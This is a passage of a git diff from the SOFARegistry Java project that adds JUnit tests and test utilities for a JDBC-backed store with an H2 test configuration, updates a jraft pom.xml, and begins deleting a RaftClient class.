protected String remarkableMessage(String msg) { + return String.format("--------------------------%s--------------------------\r\n", msg); + } + + protected void waitForAnyKeyToExit() throws IOException { + logger.info("type any key to exit.................."); + waitForAnyKey(); + } + + protected void waitForAnyKey() throws IOException { + System.in.read(); + } + + protected void waitConditionUntilTimeOut(BooleanSupplier booleanSupplier) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, 5000, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli) + throws TimeoutException, InterruptedException { + + waitConditionUntilTimeOut(booleanSupplier, waitTimeMilli, 2); + } + + protected static void waitConditionUntilTimeOut( + BooleanSupplier booleanSupplier, int waitTimeMilli, int intervalMilli) + throws TimeoutException, InterruptedException { + + long maxTime = System.currentTimeMillis() + waitTimeMilli; + + while (true) { + boolean result = booleanSupplier.getAsBoolean(); + if (result) { + return; + } + if (System.currentTimeMillis() >= maxTime) { + throw new TimeoutException("timeout still false:" + waitTimeMilli); + } + Thread.sleep(intervalMilli); + } + } + + public static int randomPort() { + return randomPort(10000, 20000, null); + } + + public static int randomPort(int min, int max, Set different) { + + Random random = new Random(); + + for (int i = min; i <= max; i++) { + int port = min + random.nextInt(max - min + 1); + if ((different == null || !different.contains(port)) && isUsable(port)) { + return port; + } + } + + throw new IllegalStateException(String.format("random port not found:(%d, %d)", min, max)); + } + + public static int netmask = (1 << 8) - 1; + + public static String randomIp() { + return String.format( + "%d.%d.%d.%d", + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1), + (Math.abs(random.nextInt()) % netmask + 1)); + } + + protected static boolean isUsable(int port) { + + try (ServerSocket s = new ServerSocket()) { + s.bind(new InetSocketAddress(port)); + return true; + } catch (IOException e) { + } + return false; + } + + public static String getDc() { + return "DEFAULT_DC"; + } + + public static String randomString() { + + return randomString(1 << 10); + } + + public static String randomString(int length) { + + StringBuilder sb = new StringBuilder(); + for (int i = 0; i < length; i++) { + sb.append((char) ('a' + (int) (26 * Math.random()))); + } + + return sb.toString(); + } + + public static class NotifyObserversCounter implements UnblockingObserver { + + private final AtomicInteger counter = new AtomicInteger(0); + + @Override + public void update(Observable source, Object message) { + counter.getAndIncrement(); + } + + public int getCounter() { + return counter.get(); + } + } + + public static class ConcurrentExecutor implements Executor { + + private final int tasks; + + private final CyclicBarrier barrier; + + private final CountDownLatch latch; + + private final ExecutorService executors; + + public ConcurrentExecutor(int tasks, ExecutorService executors) { + this.tasks = tasks; + this.barrier = new CyclicBarrier(tasks); + this.latch = new CountDownLatch(tasks); + this.executors = executors; + } + + @Override + public void execute(final Runnable command) { + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + command.run(); + } catch (Exception ignore) { + } + + latch.countDown(); + } + }); + } + try { + latch.await(); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } + } + } +} diff --git a/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/cache/HeartbeatCacheTest.java b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/cache/HeartbeatCacheTest.java new file mode 100644 index 000000000..b8b36bf5f --- /dev/null +++ b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/cache/HeartbeatCacheTest.java @@ -0,0 +1,72 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.cache; + +import com.google.common.base.Ticker; +import com.google.common.cache.CacheBuilder; +import com.google.common.cache.CacheLoader; +import com.google.common.cache.LoadingCache; +import com.google.common.cache.RemovalListener; +import java.util.HashMap; +import java.util.Map; +import java.util.concurrent.TimeUnit; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +/** + * @author xiaojian.xj + * @version $Id: HeartbeatCacheTest.java, v 0.1 2021年04月10日 16:37 xiaojian.xj Exp $ + */ +public class HeartbeatCacheTest { + + @SuppressWarnings({"unchecked"}) + private RemovalListener removalListener = Mockito.mock(RemovalListener.class); + + Ticker ticker = Mockito.mock(Ticker.class); + + private LoadingCache cache = + CacheBuilder.newBuilder() + .expireAfterAccess(3, TimeUnit.SECONDS) + // .removalListener(removalListener) + // .ticker(ticker) + .build( + new CacheLoader() { + @Override + public String load(String revision) { + return ""; + } + }); + + @Test + public void heartbeatCacheClean() throws InterruptedException { + + cache.put("foo", "bar"); + Thread.sleep(1000); + Map map = new HashMap<>(cache.asMap()); + map.forEach( + (key, value) -> { + Assert.assertEquals(key, "foo"); + }); + map.get("foo"); + + Thread.sleep(2500); + String val = cache.getIfPresent("foo"); + Assert.assertTrue(val == null); + Assert.assertEquals(cache.asMap().size(), 0); + } +} diff --git a/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/elector/MetaJdbcLeaderElectorTest.java b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/elector/MetaJdbcLeaderElectorTest.java new file mode 100644 index 000000000..5b3ce64ff --- /dev/null +++ b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/elector/MetaJdbcLeaderElectorTest.java @@ -0,0 +1,89 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.elector; + +import com.alipay.sofa.registry.jdbc.AbstractH2DbTestBase; +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.domain.DistributeLockDomain; +import com.alipay.sofa.registry.jdbc.mapper.DistributeLockMapper; +import com.alipay.sofa.registry.store.api.elector.AbstractLeaderElector; +import java.util.Date; +import java.util.concurrent.TimeoutException; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author zhuchen + * @date Mar 15, 2021, 7:46:21 PM + */ +public class MetaJdbcLeaderElectorTest extends AbstractH2DbTestBase { + + private MetaJdbcLeaderElector leaderElector; + + private DistributeLockMapper distributeLockMapper; + + private DefaultCommonConfig defaultCommonConfig; + + @Before + public void beforeMetaJdbcLeaderElectorTest() { + leaderElector = applicationContext.getBean(MetaJdbcLeaderElector.class); + distributeLockMapper = applicationContext.getBean(DistributeLockMapper.class); + defaultCommonConfig = applicationContext.getBean(DefaultCommonConfig.class); + } + + @Test + public void testDoElect() throws TimeoutException, InterruptedException { + Assert.assertNotNull(leaderElector); + leaderElector.change2Follow(); + waitConditionUntilTimeOut(() -> leaderElector.amILeader(), 5000); + } + + @Test + public void testDoQuery() throws TimeoutException, InterruptedException { + leaderElector.change2Follow(); + waitConditionUntilTimeOut(() -> leaderElector.amILeader(), 5000); + AbstractLeaderElector.LeaderInfo leaderInfo = leaderElector.doQuery(); + Assert.assertEquals(leaderInfo.getLeader(), leaderElector.myself()); + } + + @Test + public void testFollowWorking() throws TimeoutException, InterruptedException { + + leaderElector.change2Follow(); + waitConditionUntilTimeOut(() -> leaderElector.amILeader(), 5000); + + DistributeLockDomain domain = + distributeLockMapper.queryDistLock(defaultCommonConfig.getClusterId(), "META-MASTER"); + domain.setDuration(0L); + leaderElector.onFollowWorking(domain, leaderElector.myself()); + } + + @Test + public void testLeaderInfo() { + DistributeLockDomain lock = new DistributeLockDomain(); + lock.setOwner("testOwner"); + lock.setGmtModified(new Date()); + lock.setDuration(1000); + + AbstractLeaderElector.LeaderInfo leaderInfo = MetaJdbcLeaderElector.leaderFrom(lock); + Assert.assertEquals(leaderInfo.getLeader(), lock.getOwner()); + Assert.assertEquals(leaderInfo.getEpoch(), lock.getGmtModified().getTime()); + Assert.assertEquals( + leaderInfo.getExpireTimestamp(), lock.getGmtModified().getTime() + 1000 / 2); + } +} diff --git a/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionRepositoryTest.java b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionRepositoryTest.java new file mode 100644 index 000000000..774cdfdeb --- /dev/null +++ b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/AppRevisionRepositoryTest.java @@ -0,0 +1,260 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.impl; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.AppRevision; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.core.model.AppRevisionInterface; +import com.alipay.sofa.registry.jdbc.AbstractH2DbTestBase; +import com.alipay.sofa.registry.jdbc.config.DefaultCommonConfig; +import com.alipay.sofa.registry.jdbc.domain.AppRevisionDomain; +import com.alipay.sofa.registry.jdbc.mapper.AppRevisionMapper; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import com.google.common.cache.LoadingCache; +import com.google.common.collect.Maps; +import java.util.ArrayList; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.concurrent.TimeUnit; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author xiaojian.xj + * @version $Id: AppRevisionRepositoryTest.java, v 0.1 2021年04月16日 17:18 xiaojian.xj Exp $ + */ +public class AppRevisionRepositoryTest extends AbstractH2DbTestBase { + + private AppRevisionJdbcRepository appRevisionJdbcRepository; + + private InterfaceAppsJdbcRepository interfaceAppsJdbcRepository; + + private AppRevisionHeartbeatJdbcRepository appRevisionHeartbeatJdbcRepository; + + private AppRevisionMapper appRevisionMapper; + + private DefaultCommonConfig defaultCommonConfig; + + private List appRevisionList; + + private static final Integer APP_REVISION_SIZE = 1; + + @Before + public void buildAppRevision() { + appRevisionJdbcRepository = applicationContext.getBean(AppRevisionJdbcRepository.class); + interfaceAppsJdbcRepository = applicationContext.getBean(InterfaceAppsJdbcRepository.class); + appRevisionHeartbeatJdbcRepository = + applicationContext.getBean(AppRevisionHeartbeatJdbcRepository.class); + appRevisionMapper = applicationContext.getBean(AppRevisionMapper.class); + defaultCommonConfig = applicationContext.getBean(DefaultCommonConfig.class); + + appRevisionList = new ArrayList<>(); + for (int i = 1; i <= APP_REVISION_SIZE; i++) { + long l = System.currentTimeMillis(); + String suffix = l + "-" + i; + + String appname = "foo" + suffix; + String revision = "1111" + suffix; + + AppRevision appRevision = new AppRevision(); + appRevision.setAppName(appname); + appRevision.setRevision(revision); + appRevision.setClientVersion("1.0"); + + Map> baseParams = Maps.newHashMap(); + baseParams.put( + "metaBaseParam1", + new ArrayList() { + { + add("metaBaseValue1"); + } + }); + appRevision.setBaseParams(baseParams); + + Map interfaceMap = Maps.newHashMap(); + String dataInfo1 = + DataInfo.toDataInfoId( + "func1" + suffix, ValueConstants.DEFAULT_GROUP, ValueConstants.DEFAULT_INSTANCE_ID); + String dataInfo2 = + DataInfo.toDataInfoId( + "func2" + suffix, ValueConstants.DEFAULT_GROUP, ValueConstants.DEFAULT_INSTANCE_ID); + + AppRevisionInterface inf1 = new AppRevisionInterface(); + AppRevisionInterface inf2 = new AppRevisionInterface(); + interfaceMap.put(dataInfo1, inf1); + interfaceMap.put(dataInfo2, inf2); + appRevision.setInterfaceMap(interfaceMap); + + inf1.setId("1"); + Map> serviceParams1 = new HashMap>(); + serviceParams1.put( + "metaParam2", + new ArrayList() { + { + add("metaValue2"); + } + }); + inf1.setServiceParams(serviceParams1); + + inf2.setId("2"); + Map> serviceParams2 = new HashMap>(); + serviceParams1.put( + "metaParam3", + new ArrayList() { + { + add("metaValue3"); + } + }); + inf1.setServiceParams(serviceParams2); + + appRevisionList.add(appRevision); + } + } + + @Test + public void registerAndQuery() throws Exception { + + // register + for (AppRevision appRevisionRegister : appRevisionList) { + appRevisionJdbcRepository.register(appRevisionRegister); + } + + // query app_revision + for (AppRevision appRevisionRegister : appRevisionList) { + AppRevision revision = + appRevisionJdbcRepository.queryRevision(appRevisionRegister.getRevision()); + Assert.assertEquals(appRevisionRegister.getAppName(), revision.getAppName()); + } + + // query by interface + for (AppRevision appRevisionRegister : appRevisionList) { + for (Map.Entry entry : + appRevisionRegister.getInterfaceMap().entrySet()) { + String dataInfoId = entry.getKey(); + InterfaceMapping appNames = interfaceAppsJdbcRepository.getAppNames(dataInfoId); + Assert.assertTrue(appNames.getNanosVersion() > 0); + Assert.assertTrue(appNames.getApps().size() == 1); + Assert.assertTrue(appNames.getApps().contains(appRevisionRegister.getAppName())); + } + } + } + + @Test + public void revisionLoad() throws Exception { + appRevisionJdbcRepository + .getRevisions() + .asMap() + .forEach((key, value) -> appRevisionJdbcRepository.getRevisions().invalidate(key)); + + registerAndQuery(); + + LoadingCache cache = appRevisionJdbcRepository.getRevisions(); + Assert.assertEquals(cache.asMap().size(), APP_REVISION_SIZE.intValue()); + + for (AppRevision appRevisionRegister : appRevisionList) { + cache.invalidate(appRevisionRegister.getRevision()); + } + Assert.assertEquals(cache.asMap().size(), 0); + + // query app_revision + for (AppRevision appRevisionRegister : appRevisionList) { + AppRevision revision = + appRevisionJdbcRepository.queryRevision(appRevisionRegister.getRevision()); + Assert.assertEquals(appRevisionRegister.getAppName(), revision.getAppName()); + } + + Assert.assertEquals(cache.asMap().size(), APP_REVISION_SIZE.intValue()); + } + + class HeartbeatRunner extends LoopRunnable { + + @Override + public void runUnthrowable() { + for (AppRevision appRevision : appRevisionList) { + boolean success = appRevisionJdbcRepository.heartbeat(appRevision.getRevision()); + if (!success) { + try { + appRevisionJdbcRepository.register(appRevision); + } catch (Exception e) { + e.printStackTrace(); + } + } + } + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly(1, TimeUnit.SECONDS); + } + } + + @Test + public void heartbeatClean() throws Exception { + + registerAndQuery(); + + for (AppRevision appRevision : appRevisionList) { + + boolean before = appRevisionJdbcRepository.heartbeat(appRevision.getRevision()); + Assert.assertTrue(before); + appRevisionMapper.deleteAppRevision( + defaultCommonConfig.getClusterId(), appRevision.getRevision()); + + boolean after = appRevisionJdbcRepository.heartbeat(appRevision.getRevision()); + Assert.assertTrue(after); + AppRevisionDomain query = + appRevisionMapper.queryRevision( + defaultCommonConfig.getClusterId(), appRevision.getRevision()); + Assert.assertTrue(query == null); + } + appRevisionHeartbeatJdbcRepository.doHeartbeatCacheChecker(); + + for (AppRevision appRevision : appRevisionList) { + boolean success = appRevisionJdbcRepository.heartbeat(appRevision.getRevision()); + Assert.assertFalse(success); + } + + ConcurrentUtils.createDaemonThread("heartbeatClean-test", new HeartbeatRunner()).start(); + Thread.sleep(3000); + for (AppRevision appRevision : appRevisionList) { + + boolean success = appRevisionJdbcRepository.heartbeat(appRevision.getRevision()); + Assert.assertTrue(success); + appRevisionMapper.deleteAppRevision( + defaultCommonConfig.getClusterId(), appRevision.getRevision()); + } + } + + @Test + public void revisionGc() throws Exception { + registerAndQuery(); + + appRevisionHeartbeatJdbcRepository.doAppRevisionGc(0); + + for (AppRevision appRevision : appRevisionList) { + AppRevisionDomain query = + appRevisionMapper.queryRevision( + defaultCommonConfig.getClusterId(), appRevision.getRevision()); + Assert.assertTrue(query == null); + } + } +} diff --git a/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/InterfaceAppsJdbcRepositoryTest.java b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/InterfaceAppsJdbcRepositoryTest.java new file mode 100644 index 000000000..3e81765c8 --- /dev/null +++ b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/InterfaceAppsJdbcRepositoryTest.java @@ -0,0 +1,79 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.impl; + +import com.alipay.sofa.registry.common.model.appmeta.InterfaceMapping; +import com.alipay.sofa.registry.jdbc.AbstractH2DbTestBase; +import java.util.ArrayList; +import java.util.HashSet; +import java.util.List; +import java.util.Map; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author xiaojian.xj + * @version $Id: InterfaceAppsJdbcRepositoryTest.java, v 0.1 2021年04月12日 10:31 xiaojian.xj Exp $ + */ +public class InterfaceAppsJdbcRepositoryTest extends AbstractH2DbTestBase { + private InterfaceAppsJdbcRepository interfaceAppsJdbcRepository; + + @Before + public void build() { + interfaceAppsJdbcRepository = applicationContext.getBean(InterfaceAppsJdbcRepository.class); + } + + @Test + public void batchSaveTest() { + + String app = "batchSaveApp"; + List services = new ArrayList<>(); + for (int i = 0; i < 100; i++) { + services.add(i + "batchSaveService-" + System.currentTimeMillis()); + } + + interfaceAppsJdbcRepository.batchSave(app, new HashSet<>(services)); + for (String service : services) { + InterfaceMapping appNames = interfaceAppsJdbcRepository.getAppNames(service); + Assert.assertEquals(1, appNames.getApps().size()); + Assert.assertTrue(appNames.getApps().contains(app)); + } + } + + @Test + public void loadMetadataTest() { + String app = "loadMetadataTest"; + List services = new ArrayList<>(); + for (int i = 0; i < 100; i++) { + services.add(i + "loadMetadataTest-" + System.currentTimeMillis()); + } + + Map interfaceApps = interfaceAppsJdbcRepository.getInterfaceApps(); + interfaceApps.clear(); + interfaceAppsJdbcRepository.batchSave(app, new HashSet<>(services)); + Assert.assertEquals(interfaceApps.size(), 0); + + interfaceAppsJdbcRepository.loadMetadata(); + + for (String service : services) { + InterfaceMapping interfaceMapping = interfaceApps.get(service); + Assert.assertEquals(interfaceMapping.getApps().size(), 1); + Assert.assertTrue(interfaceMapping.getApps().contains(app)); + } + } +} diff --git a/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/ProvideDataJdbcRepositoryTest.java b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/ProvideDataJdbcRepositoryTest.java new file mode 100644 index 000000000..52bb50651 --- /dev/null +++ b/server/store/jdbc/src/test/java/com/alipay/sofa/registry/jdbc/repository/impl/ProvideDataJdbcRepositoryTest.java @@ -0,0 +1,82 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.jdbc.repository.impl; + +import com.alipay.sofa.registry.common.model.console.PersistenceData; +import com.alipay.sofa.registry.common.model.console.PersistenceDataBuilder; +import com.alipay.sofa.registry.common.model.store.DataInfo; +import com.alipay.sofa.registry.jdbc.AbstractH2DbTestBase; +import com.alipay.sofa.registry.store.api.meta.ProvideDataRepository; +import java.util.Collection; +import org.junit.Assert; +import org.junit.Test; +import org.springframework.beans.factory.annotation.Autowired; + +public class ProvideDataJdbcRepositoryTest extends AbstractH2DbTestBase { + + @Autowired private ProvideDataRepository provideDataJdbcRepository; + + @Test + public void testPut() { + long version = System.currentTimeMillis(); + + String dataInfoId = DataInfo.toDataInfoId("key" + version, "DEFAULT", "DEFAULT"); + PersistenceData persistenceData = + PersistenceDataBuilder.createPersistenceData(dataInfoId, "val"); + boolean success = provideDataJdbcRepository.put(persistenceData, persistenceData.getVersion()); + Assert.assertTrue(success); + Assert.assertEquals("val", provideDataJdbcRepository.get(dataInfoId).getData()); + Assert.assertEquals( + persistenceData.getVersion(), provideDataJdbcRepository.get(dataInfoId).getVersion()); + } + + @Test + public void testRemove() { + long version = System.currentTimeMillis(); + + String dataInfoId = DataInfo.toDataInfoId("key" + version, "DEFAULT", "DEFAULT"); + PersistenceData persistenceData = + PersistenceDataBuilder.createPersistenceData(dataInfoId, "val"); + + boolean success = provideDataJdbcRepository.put(persistenceData, version); + Assert.assertTrue(success); + Assert.assertEquals("val", provideDataJdbcRepository.get(dataInfoId).getData()); + Assert.assertEquals( + persistenceData.getVersion(), provideDataJdbcRepository.get(dataInfoId).getVersion()); + boolean remove = provideDataJdbcRepository.remove(dataInfoId, persistenceData.getVersion()); + + Assert.assertTrue(remove); + Assert.assertTrue(provideDataJdbcRepository.get(dataInfoId) == null); + } + + @Test + public void testGetAll() { + long version = System.currentTimeMillis(); + + String dataInfoId = DataInfo.toDataInfoId("testGetAll" + version, "DEFAULT", "DEFAULT"); + PersistenceData persistenceData = + PersistenceDataBuilder.createPersistenceData(dataInfoId, "val"); + boolean success = provideDataJdbcRepository.put(persistenceData, persistenceData.getVersion()); + Assert.assertTrue(success); + Assert.assertEquals("val", provideDataJdbcRepository.get(dataInfoId).getData()); + Assert.assertEquals( + persistenceData.getVersion(), provideDataJdbcRepository.get(dataInfoId).getVersion()); + + Collection all = provideDataJdbcRepository.getAll(); + Assert.assertTrue(all.contains(persistenceData)); + } +} diff --git a/server/store/jdbc/src/test/resources/application-test.properties b/server/store/jdbc/src/test/resources/application-test.properties new file mode 100644 index 000000000..b35378534 --- /dev/null +++ b/server/store/jdbc/src/test/resources/application-test.properties @@ -0,0 +1,32 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +## connect db +spring.h2.console.enabled=true +persistence.profile.active=jdbc +jdbc.driverClassName=org.h2.Driver +jdbc.url=jdbc:h2:mem:metadatadb;DB_CLOSE_DELAY=-1;MODE=MySQL;MV_STORE=FALSE +jdbc.username=sa +jdbc.password= +spring.datasource.schema=sql/h2/create_table.sql +#spring.datasource.data=sql/h2/base_info.sql + +#jdbc.typeAliasesPackage=com.alipay.sofa.registry.jdbc.domain +jdbc.mapperLocations=classpath:h2-mapper/*.xml + + + diff --git a/server/store/jraft/pom.xml b/server/store/jraft/pom.xml index 188f0d851..b42c61cef 100644 --- a/server/store/jraft/pom.xml +++ b/server/store/jraft/pom.xml @@ -6,7 +6,7 @@ com.alipay.sofa registry-store - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml @@ -18,13 +18,42 @@ - junit - junit + com.alipay.sofa + jraft-rheakv-core + 1.3.6 + + + org.springframework.boot + spring-boot-starter-validation + + + org.springframework + spring-test test - ch.qos.logback - logback-classic + org.springframework.boot + spring-boot-test + test + + + org.mockito + mockito-core + test + + + org.springframework.boot + spring-boot-starter + + + org.springframework.boot + spring-boot-starter-logging + + + + + junit + junit test @@ -41,7 +70,7 @@ com.alipay.sofa - registry-store-api + registry-store-common org.slf4j diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftClient.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftClient.java deleted file mode 100644 index 84af2be5d..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftClient.java +++ /dev/null @@ -1,252 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.bootstrap; - -import com.alipay.remoting.ConnectionEventType; -import com.alipay.remoting.rpc.RpcClient; -import com.alipay.sofa.jraft.RouteTable; -import com.alipay.sofa.jraft.Status; -import com.alipay.sofa.jraft.conf.Configuration; -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.jraft.option.CliOptions; -import com.alipay.sofa.jraft.rpc.CliClientService; -import com.alipay.sofa.jraft.rpc.impl.AbstractBoltClientService; -import com.alipay.sofa.jraft.rpc.impl.cli.BoltCliClientService; -import com.alipay.sofa.registry.jraft.command.ProcessRequest; -import com.alipay.sofa.registry.jraft.command.ProcessResponse; -import com.alipay.sofa.registry.jraft.handler.NotifyLeaderChangeHandler; -import com.alipay.sofa.registry.jraft.handler.RaftClientConnectionHandler; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.bolt.ConnectionEventAdapter; -import com.alipay.sofa.registry.remoting.bolt.SyncUserProcessorAdapter; - -import java.util.concurrent.TimeUnit; -import java.util.concurrent.atomic.AtomicBoolean; - -/** - * - * @author shangyu.wh - * @version $Id: RaftClient.java, v 0.1 2018-05-16 11:40 shangyu.wh Exp $ - */ -public class RaftClient { - - private static final Logger LOGGER = LoggerFactory.getLogger(RaftClient.class); - - private BoltCliClientService cliClientService; - private RpcClient rpcClient; - private CliOptions cliOptions; - private String groupId; - private Configuration conf; - - private AtomicBoolean started = new AtomicBoolean(false); - - /** - * @param groupId - * @param confStr Example: 127.0.0.1:8081,127.0.0.1:8082,127.0.0.1:8083 - */ - public RaftClient(String groupId, String confStr) { - - this.groupId = groupId; - conf = new Configuration(); - if (!conf.parse(confStr)) { - throw new IllegalArgumentException("Fail to parse conf:" + confStr); - } - cliOptions = new CliOptions(); - cliClientService = new BoltCliClientService(); - } - - /** - * @param groupId - * @param confStr - * @param cliClientService - */ - public RaftClient(String groupId, String confStr, AbstractBoltClientService cliClientService) { - - this.groupId = groupId; - conf = new Configuration(); - if (!conf.parse(confStr)) { - throw new IllegalArgumentException("Fail to parse conf:" + confStr); - } - cliOptions = new CliOptions(); - this.cliClientService = (BoltCliClientService) cliClientService; - } - - /** - * raft client start - */ - public void start() { - if (started.compareAndSet(false, true)) { - - RouteTable.getInstance().updateConfiguration(groupId, conf); - - cliClientService.init(cliOptions); - - rpcClient = cliClientService.getRpcClient(); - - RaftClientConnectionHandler raftClientConnectionHandler = new RaftClientConnectionHandler( - this); - - rpcClient.addConnectionEventProcessor(ConnectionEventType.CONNECT, - new ConnectionEventAdapter(ConnectionEventType.CONNECT, - raftClientConnectionHandler, null)); - rpcClient.addConnectionEventProcessor(ConnectionEventType.CLOSE, - new ConnectionEventAdapter(ConnectionEventType.CLOSE, raftClientConnectionHandler, - null)); - rpcClient.addConnectionEventProcessor(ConnectionEventType.EXCEPTION, - new ConnectionEventAdapter(ConnectionEventType.EXCEPTION, - raftClientConnectionHandler, null)); - - //reset leader notify - NotifyLeaderChangeHandler notifyLeaderChangeHandler = new NotifyLeaderChangeHandler( - groupId, cliClientService); - rpcClient - .registerUserProcessor(new SyncUserProcessorAdapter(notifyLeaderChangeHandler)); - - } - } - - /** - * stop cliClientService - */ - public void shutdown() { - if (cliClientService != null) { - cliClientService.shutdown(); - } - } - - /** - * repick leader - * @return - */ - public PeerId refreshLeader() { - return refreshLeader(cliClientService, groupId, cliOptions.getRpcDefaultTimeout()); - } - - public static PeerId refreshLeader(CliClientService cliClientService, String groupId, - int timeout) { - try { - Status status = RouteTable.getInstance().refreshLeader(cliClientService, groupId, - timeout); - if (!status.isOk()) { - throw new IllegalStateException(String.format("Refresh leader failed,error=%s", - status.getErrorMsg())); - } - PeerId leader = RouteTable.getInstance().selectLeader(groupId); - LOGGER.info("Leader is {}", leader); - - //avoid refresh leader config ip list must be current list,list maybe change by manage - status = 